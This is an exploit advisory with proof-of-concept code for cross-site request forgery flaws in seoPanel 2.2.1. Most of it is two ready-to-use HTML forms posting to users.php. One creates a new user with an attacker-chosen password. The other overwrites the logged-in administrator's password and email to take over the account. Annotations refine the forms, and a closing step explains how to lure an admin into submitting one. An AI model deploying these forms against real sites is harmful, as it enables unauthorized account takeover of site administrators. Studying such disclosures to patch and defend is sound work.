Title: seoPanel (v.2.2.1) Multiple CSRF Vulnerabilities
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com | ked-h@exploit-id.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Web Site: www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: CSRF in users.php => (1) Add New User [+] (2) Change the logged-in Admin's Account Settings, including the password (account takeover)
# Tested on: Windows XP sp3 FR & Linux. (Ubuntu 10.10) En
###
#(~) Greetings To: Caddy-Dz (+) JaGo-Dz (+) Dr. Ride (+) All My Friends
###
# (+) Exploit: Multiple Cross-Site Request Forgery (CSRF) => users.php performs state-changing POST actions (sec=create / sec=update) without an anti-CSRF token, so attacker-hosted HTML loaded by a logged-in administrator submits them with the admin's session.
#======= [CSRF (1) Add New User] ==========================>
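<!-- CSRF PoC (1): create a new seoPanel user via users.php (sec=create).
     Preconditions (as the advisory describes): the victim is logged in to seoPanel
     with rights to create users, and users.php checks neither an anti-CSRF token
     nor the Origin/Referer header. Replace [TARGET] with the seoPanel host (and
     install path, if any). The original PoC carried an Onclick/Href copied from
     seoPanel's own page that referenced JS functions absent on an attacker page,
     and placed inputs outside any table row; both are dropped here.
     NOTE(review): browsers that default cookies to SameSite=Lax do not attach the
     victim's session cookie to a cross-site POST unless the cookie is explicitly
     SameSite=None; confirm against the target before relying on this PoC. -->
<form id="newUser" action="http://[TARGET]/users.php" method="POST">
  <!-- sec=create selects the "add user" branch of users.php -->
  <input type="hidden" name="sec" value="create">
  <input type="hidden" name="userName" value="KedAns-Dz">
  <!-- the original left both password fields empty, which a create handler is
       likely to reject; use the password the attacker intends to log in with,
       identical in both fields -->
  <input type="hidden" name="password" value="AttackerChosenPassword">
  <input type="hidden" name="confirmPassword" value="AttackerChosenPassword">
  <input type="hidden" name="firstName" value="Ked">
  <input type="hidden" name="lastName" value="Ans">
  <!-- trailing space removed from the address -->
  <input type="hidden" name="email" value="Ked-h@hotmail.com">
  <input type="submit" value="Add New User!">
</form>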
#======= [CSRF (2) Change Admin Account Settings] ========================>
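<!-- CSRF PoC (2): overwrite the logged-in administrator's account settings via
     users.php (sec=update), including the password -> account takeover.
     Preconditions (as the advisory describes): the victim is logged in to seoPanel
     as the administrator, and users.php checks neither an anti-CSRF token nor the
     Origin/Referer header. Replace [TARGET] with the seoPanel host (and install
     path, if any). The original PoC carried an Onclick/Href copied from seoPanel's
     own page that referenced JS functions absent on an attacker page, and placed
     inputs outside any table row; both are dropped here.
     NOTE(review): no user id is submitted; the advisory implies users.php resolves
     the account to update from the session - confirm against the application.
     NOTE(review): browsers that default cookies to SameSite=Lax do not attach the
     victim's session cookie to a cross-site POST unless the cookie is explicitly
     SameSite=None; confirm against the target before relying on this PoC. -->
<form id="updateUser" action="http://[TARGET]/users.php" method="POST">
  <!-- sec=update selects the "edit account" branch of users.php -->
  <input type="hidden" name="sec" value="update">
  <input type="hidden" name="userName" value="admin">
  <!-- the original left both password fields empty; set the password the attacker
       will use to log in as the victim afterwards, identical in both fields -->
  <input type="hidden" name="password" value="AttackerChosenPassword">
  <input type="hidden" name="confirmPassword" value="AttackerChosenPassword">
  <input type="hidden" name="firstName" value="admin">
  <input type="hidden" name="lastName" value="owner">
  <!-- trailing space removed from the address; an attacker-controlled mailbox
       also redirects any password-reset mail the application may send -->
  <input type="hidden" name="email" value="Ked-h@hotmail.com">
  <input type="submit" value="Change Account Settings!">
</form>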
[++ --- = {Exploiting: Save either form above as an .html file on an attacker-controlled site and get a logged-in seoPanel administrator to open it and press the button; the browser sends the admin's session cookie with the cross-site POST to users.php. Note: the PoC fails if users.php validates an anti-CSRF token or the Origin/Referer header, or if the session cookie is not sent cross-site (SameSite=Lax/Strict).} = --- ++]
# (^_^ )! Good Luck ALL...
#=================== [Exploited By KedAns-Dz * HST-Dz *] ============ ======================================
# Greets To: [D] HaCkerS-StreeT-Team [Z] <Algerians HaCkerS>
# + Greets To Inj3ct0r Operators Team: r0073r * Sid3 ^ effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337: Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# Gunslinger _ * Sn! PEr. S! Te * ZoRLu * anT! -Tr0J4n * ^ Xecuti0N3r www.1337day.com/team ++ ....
# Exploit-Id Team: jos_ali_joe + Caddy-Dz (exploit-id.com)... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto. me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs...
#===================================================== ====================================